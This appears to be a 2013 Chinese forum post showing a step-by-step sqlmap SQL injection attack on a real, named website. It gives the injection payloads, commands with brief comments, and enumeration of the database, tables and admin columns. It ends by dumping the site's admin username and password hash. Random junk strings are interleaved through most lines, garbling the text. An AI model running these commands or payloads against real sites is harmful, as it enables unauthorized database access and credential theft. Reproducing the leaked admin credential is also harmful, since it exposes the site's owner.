D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db! k' ?. k8 f; ^; A' Z4 [
ms "Mysql" --current-user /* 注解:获取当前用户名称
: e* m+ t% o2 n3 Z sqlmap/0.9 - automatic SQL injection and database takeover tool
, S# ^- q8 L$ L7 z http://sqlmap.sourceforge.net starting at: 16:53:54
. m F$ u8 T$ R" P8 L, y[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
" r$ F# j- r Y. v session file3 ]7 X+ g" k' N' N2 v
[16:53:54] [INFO] resuming injection data from session file0 k- z# a) @* m: b
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file5 p9 a% q& p; _, }, e. y
[16:53:54] [INFO] testing connection to the target url2 ^ \; P! d( q/ r7 M4 T$ R9 J
sqlmap identified the following injection points with a total of 0 HTTP(s) reque$ ]$ w7 N4 C( n8 F; \* m. ^+ \& m
sts:4 [- ?5 N0 r% m& t: n1 O* r+ C
---) N& D* y! n5 n* v) O) Y+ ?4 G# f
Place: GET5 ?; }0 W# ]6 f D0 a" c
Parameter: id
6 D& B* C, |$ \0 T" }9 r1 ^ Type: boolean-based blind5 Y2 G4 y; {& l+ w- P0 }' A
Title: AND boolean-based blind - WHERE or HAVING clause6 b, \* L- [) b5 l* [1 }
Payload: id=276 AND 799=799* V4 \( B# P& [8 ^2 t; p' {$ |9 K, k& M6 |
Type: error-based) A* S& {8 t- o( D6 z
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) q3 T$ Z. O% ?; T' b
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,6 M6 t6 m3 u0 U
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
4 K! n+ r( }9 `: Z),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
: c) Q- s2 L/ }; m( {4 L5 N Type: UNION query0 y+ Q& q6 t- l- V
Title: MySQL UNION query (NULL) - 1 to 10 columns
" B! [; d2 ~( d( f+ F Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR; F7 J9 M8 U+ n, H& r0 b3 g
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),5 ?) C6 f; ]& _/ U) \5 K1 g
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#' [; G {5 G) ^
Type: AND/OR time-based blind
. \) n! t& I" u& k i( C Title: MySQL > 5.0.11 AND time-based blind
) s* l/ Y7 C. ?2 f3 u. l: B! X) T Payload: id=276 AND SLEEP(5)
: u$ ~1 d- f+ T# `---
3 y3 A% z1 G, ~2 R5 x3 B[16:53:55] [INFO] the back-end DBMS is MySQL
2 m; \, A$ M, z! E% Z5 o$ V5 kweb server operating system: Windows
8 c, T/ @6 [& Y6 n/ l9 E* Xweb application technology: Apache 2.2.11, PHP 5.3.09 s0 I8 D- l V7 Y9 f. O
back-end DBMS: MySQL 5.0
; f1 c4 s7 q) w1 X! P# F- L! F! n[16:53:55] [INFO] fetching current user+ z7 B) {2 [* r, ^# I
current user: 'root@localhost' 2 l6 s0 G2 |' x% B
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou6 c- V. }3 l4 Q3 w+ `
tput\www.wepost.com.hk' shutting down at: 16:53:589 j9 j: q2 p# `" Q
5 \: S1 P) b* ~/ }9 zD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
, m b. w5 L, R N! X. K! vms "Mysql" --current-db /*当前数据库, E' h7 u) Z2 x& z8 c
sqlmap/0.9 - automatic SQL injection and database takeover tool# e0 X* ]7 X0 X# g
http://sqlmap.sourceforge.net starting at: 16:54:16
. [3 L9 O% V+ @( u7 s[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
1 y" T! C( H$ x3 A2 d session file) b( L7 q* q5 `, |
[16:54:16] [INFO] resuming injection data from session file
; V2 G- H3 d3 H$ J8 f) n[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file& L$ B. y0 q; \/ p& ^8 Y6 b
[16:54:16] [INFO] testing connection to the target url% o9 R+ R2 F$ T/ @( Q3 }
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 G6 f* Z: u' t' Y+ F; Z; rsts:& ]$ z, R6 g* e) l- m
---0 b; a( q/ E3 c5 @7 ^2 F5 Q! _2 Z
Place: GET/ O8 ^2 z3 B2 k, j. v( x
Parameter: id" C$ c9 a, r; b- ~7 m# ?6 o9 W: u
Type: boolean-based blind9 r# I3 A0 ^2 v! a* k2 ?% }9 \6 c" @' U. l
Title: AND boolean-based blind - WHERE or HAVING clause7 e0 A9 ~/ r0 B) D: C, Y
Payload: id=276 AND 799=7997 i j) o* P( T A0 i6 E/ m
Type: error-based
6 x& P5 D! A1 O4 k" i/ V$ Q" K Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
9 a! x7 u0 k" G0 X: P2 v Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,' `# Q9 h. R+ c7 q9 ?6 ^! E: |
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,586 [! V" Z2 r; f a4 |
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
6 F* T( s3 { Z4 X Type: UNION query( v+ k [- i8 F: X8 R
Title: MySQL UNION query (NULL) - 1 to 10 columns
& o: K5 }" s" s$ X) {7 r Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
2 o( V8 Z V6 ?, s" ?0 L5 O(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
* R1 c/ X O1 G) a0 y/ QCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
5 z' q3 v5 V9 I; { Type: AND/OR time-based blind
* x7 B' P1 x8 k Title: MySQL > 5.0.11 AND time-based blind
9 A. j) t( E) K% B Payload: id=276 AND SLEEP(5)* d! X2 n+ c# N: h1 q, t
---* B0 Y9 k1 x' |
[16:54:17] [INFO] the back-end DBMS is MySQL# u$ K) {9 a. k+ [, s" `# P; x
web server operating system: Windows* P$ z4 I. C, {5 b
web application technology: Apache 2.2.11, PHP 5.3.0
2 ?, h U( o8 E* _% Nback-end DBMS: MySQL 5.00 P |/ ?9 o6 ^; ` e
[16:54:17] [INFO] fetching current database; C: s# u, o' o3 \
current database: 'wepost'
& [9 l4 e# v; v+ A, `4 ][16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou3 z& _6 K1 G+ ^; b3 j8 T
tput\www.wepost.com.hk' shutting down at: 16:54:184 D2 y& r- G* G' [: k
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
, g, \ Z. _5 R+ G" ^ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
+ ?2 d/ [. B) G" c5 e& d sqlmap/0.9 - automatic SQL injection and database takeover tool
4 N8 ?, L& Q1 m$ H http://sqlmap.sourceforge.net starting at: 16:55:25
: j, Q& Z* o B9 h4 K* x+ @[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as& L) w6 H) r3 }1 M0 r, P! h7 L
session file
6 h1 U; s7 h$ {/ n) |1 r; d8 l* }[16:55:25] [INFO] resuming injection data from session file6 y1 m! i& P# Y6 K
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file _1 ~- ?: O) [- Y3 _1 w
[16:55:25] [INFO] testing connection to the target url
+ e$ b6 Q9 U4 c9 r1 Ksqlmap identified the following injection points with a total of 0 HTTP(s) reque
4 N. U X8 O" tsts:
& c+ U7 t8 a2 D% S( p---
( ]9 l* i4 U. U9 o! P5 H9 D: X/ oPlace: GET3 d3 U/ ^2 L; o7 s* A" x. R
Parameter: id' K% N# q2 c2 s7 q$ E
Type: boolean-based blind* p, ^0 k$ M! ]* j
Title: AND boolean-based blind - WHERE or HAVING clause; K# o: ^# t3 z8 p. w: h
Payload: id=276 AND 799=799
/ C& E2 w0 p4 ?7 D Type: error-based1 ~, U# }1 E) N) R: S1 }
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause& T% U# X0 ]4 D7 m' H; }
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% E. ?8 c* T: f5 o2 T- N
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
9 U6 w, j* a5 X4 x) y, a' m4 `& W),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
* u3 M3 I; \- r- M( r Type: UNION query9 f( Z, Q; E! @* q
Title: MySQL UNION query (NULL) - 1 to 10 columns/ G3 N& z5 L/ @6 K( ?6 m
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
# J1 ~% s" B# U) J9 ~(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
. `8 t9 F$ k. K" i; I. |) aCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 i+ a+ ^4 t# a' c- S
Type: AND/OR time-based blind
, ^6 p2 s% y7 R) H2 m; H+ f$ ? Title: MySQL > 5.0.11 AND time-based blind$ J+ w# { N! W: K. L. T2 F
Payload: id=276 AND SLEEP(5)
1 L, I2 Z) ~" \) `( f# F$ B! `, K---
/ o( y9 ~. H8 \* L# r5 ^/ |[16:55:26] [INFO] the back-end DBMS is MySQL
# `+ w' x3 d; W) g6 M3 ]6 S- k) [web server operating system: Windows
: E: i* Y. o3 b$ k# ]# Sweb application technology: Apache 2.2.11, PHP 5.3.0" Y3 }; Q' C, x# F6 X6 ^4 f/ }& M$ ^. e
back-end DBMS: MySQL 5.0$ x) I; K) g- S4 o7 I. K) e
[16:55:26] [INFO] fetching tables for database 'wepost'
: D8 `* R- Z7 v( ]+ y( j( V[16:55:27] [INFO] the SQL query used returns 6 entries* e: v6 f% l* p
Database: wepost
% E4 n! L9 x* P, R, d[6 tables]
9 p5 e( |9 ?' m' s& Q. G5 X+-------------+
) q x( \- Q: i! P6 B| admin |
3 M% e: k1 g9 w; m' k& s6 D* ^| article |7 w: `: Q2 }. ?" [" x7 J( I6 K
| contributor |
6 |% C% y7 d% n$ K$ \| idea |- r+ M6 d; F; U1 `# A- G$ g
| image |
% ^9 t2 Z; K/ m5 e% V| issue |7 L' i9 z, Z) _. t# R% y. V
+-------------+8 `( g# a! Q! E2 t
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
& v9 H- f( T; f. V7 S/ K5 l( _tput\www.wepost.com.hk' shutting down at: 16:55:33; U8 h8 b3 P# ~2 @7 W
. F! Y) x8 Q" ^4 p1 oD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
, q+ F) I1 P' D3 O1 f- g' ums "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
8 l9 J) j0 r+ r9 c8 i; C sqlmap/0.9 - automatic SQL injection and database takeover tool% w8 y6 u$ g+ o, y+ L% w B0 l
http://sqlmap.sourceforge.net starting at: 16:56:06( ?% M0 Q% X# h/ A, n( V( O
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
" }6 G Z" t( x# _$ ^& z- |6 W+ ssts:
4 r$ C6 w7 B" B+ g5 A---5 }2 `: X. K! j; N" a
Place: GET% I% S, e- X7 U; s0 K$ S
Parameter: id
+ l+ G+ p/ \. n4 G7 _ Type: boolean-based blind
8 D3 s2 |9 ]# H: U5 Q: B Title: AND boolean-based blind - WHERE or HAVING clause
( ?2 m% S( @* F$ }$ G1 I* O Payload: id=276 AND 799=799
# L3 n# z, L' b' _ Type: error-based0 V" T- p( y+ m. x$ {# l; k& I8 c
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, L7 E x& g' a# `" i! ?0 E
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,' X5 z# f9 Z! u2 }
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
% {- P6 m/ [) {) ]),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)& h( p& p% T$ f& E5 U. z: m
Type: UNION query
5 o/ c2 t" D% M- v/ G Title: MySQL UNION query (NULL) - 1 to 10 columns
+ m, _: Y! p4 \2 s) c6 [# Q" f5 ~ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR# E2 l6 T" Z5 l [
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
& J% W+ `( o! X+ [, ^( {7 ]CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
. R0 ?* \4 _3 W$ H3 n: h Type: AND/OR time-based blind
1 L% i8 W8 O# x8 R0 v l! E Title: MySQL > 5.0.11 AND time-based blind
8 _6 S2 e7 B; ?4 j Payload: id=276 AND SLEEP(5)6 n! ?# H0 w* C; t
---
, H! J$ P# r/ x: _& m- K Wweb server operating system: Windows
5 v6 b$ E. s/ E: D x! ?web application technology: Apache 2.2.11, PHP 5.3.06 x% q1 b! X5 K! Y
back-end DBMS: MySQL 5.0
, l8 n' y7 v, v. W9 N7 ^[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
: B" b( ~) v, p4 L; Xssion': wepost, wepost
9 J6 G& ]. R6 PDatabase: wepost1 F/ q8 P5 q) `5 E9 H3 h
Table: admin E2 U4 D) H& i1 Y; \' K
[4 columns]
v1 X1 a0 I; S- B8 D+----------+-------------+, ?0 G9 R( |2 l1 f. D9 W: P
| Column | Type |
' q7 e# A. l1 E4 y, |1 G+----------+-------------+! k: T3 ^8 m7 _0 U
| id | int(11) |6 a2 ]' f/ P+ j5 D
| password | varchar(32) |0 N5 J2 y: Q% J0 p9 D6 M7 z; r
| type | varchar(10) |) j/ _2 ~: l$ ]5 M) R7 y+ Y& o
| userid | varchar(20) |/ }' I0 f. T6 @6 ~0 y' v
+----------+-------------+
# j/ u% Z8 {5 B l shutting down at: 16:56:19
0 `- @( M" H8 t2 x3 @6 G C, y# E/ u& ^% c1 Y' V0 U& ^" t1 `& Q
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db* V! B( i+ u, R7 h& B$ p+ Y* r9 `
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容, ?1 i! L7 ^% U0 N8 A' r1 r$ K
sqlmap/0.9 - automatic SQL injection and database takeover tool
/ R+ J9 ^2 N% U$ k4 L* R% O6 w7 t; _8 ] http://sqlmap.sourceforge.net starting at: 16:57:14' f2 @: |3 D" [+ c: A- [5 H
sqlmap identified the following injection points with a total of 0 HTTP(s) reque; S) I' l. U3 O" ^3 ~7 X
sts:
9 D& L+ l& f: T/ d8 j, r. Z% q% C( Y---1 @8 _7 m$ c2 J; t
Place: GET
4 n8 V: Y$ X% X" f8 Z2 xParameter: id& N. Q4 A3 X( G; l- M8 \
Type: boolean-based blind
2 ^# o. ?' v- ~& b! ^) s$ x" L Title: AND boolean-based blind - WHERE or HAVING clause
% L. l: H4 j3 b2 D+ |! \ Payload: id=276 AND 799=799, L; }0 A9 w2 y% ]6 v
Type: error-based' Y8 j$ D" l8 }4 P/ w) \: N
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; Y7 u9 \9 v* \ b9 E; A
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
8 s/ j( R$ z9 T3 E6 s- G120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58/ a, }; u1 ]" q. E3 o; J8 V
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
$ E3 b, \4 O" e1 P8 ^: J4 u Type: UNION query
. d- q. O3 `" l3 E0 A* G Title: MySQL UNION query (NULL) - 1 to 10 columns4 J3 U" |3 E7 Z
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR5 O- p# C2 w% q, q4 A) }: ^$ k
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),& ^* _) U/ b0 W. F) W O
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
+ ]/ ?+ M9 L' Q7 W; @: N Type: AND/OR time-based blind8 ^) Z3 F1 Z' Z9 f9 y8 x& _
Title: MySQL > 5.0.11 AND time-based blind
8 R( }' w0 N7 H4 V Payload: id=276 AND SLEEP(5)
$ k& F9 w4 ?7 S) e" \: {---% {- z- u p% I* s9 C
web server operating system: Windows/ C) m* s; A9 V9 u2 n' h6 ]
web application technology: Apache 2.2.11, PHP 5.3.0
1 s: Q+ H0 U; d3 N. qback-end DBMS: MySQL 5.0
3 ?; Z4 B4 v4 ~) O! x( Lrecognized possible password hash values. do you want to use dictionary attack o
( b$ f+ t8 z) K) @. b+ e+ q f% Q+ u0 cn retrieved table items? [Y/n/q] y
2 W7 \3 A3 B# ~' d& t4 wwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
# b5 z9 L4 j1 G7 ddo you want to use common password suffixes? (slow!) [y/N] y
0 x) e- V6 Q5 ^+ LDatabase: wepost
3 U. y. r3 u: @3 v# lTable: admin
2 A- s7 U& b3 `8 |. [[1 entry]
: f: }( e' t5 w# o/ p$ Q+----------------------------------+------------+
; o9 V/ H* g$ M| password | userid |$ W9 C; Z( U- z! e: l o$ Z+ I. {
+----------------------------------+------------+
0 P5 h$ \) O6 L! S| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
0 ^) `+ X: w6 ]+----------------------------------+------------+; g6 f& y: o/ p! S
shutting down at: 16:58:14
8 a$ V4 \" R1 A: i6 T- L( e& J% f
8 p% k) K4 R* j4 a2 h, ^1 I! R l# A# ^D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
分享
支持
反对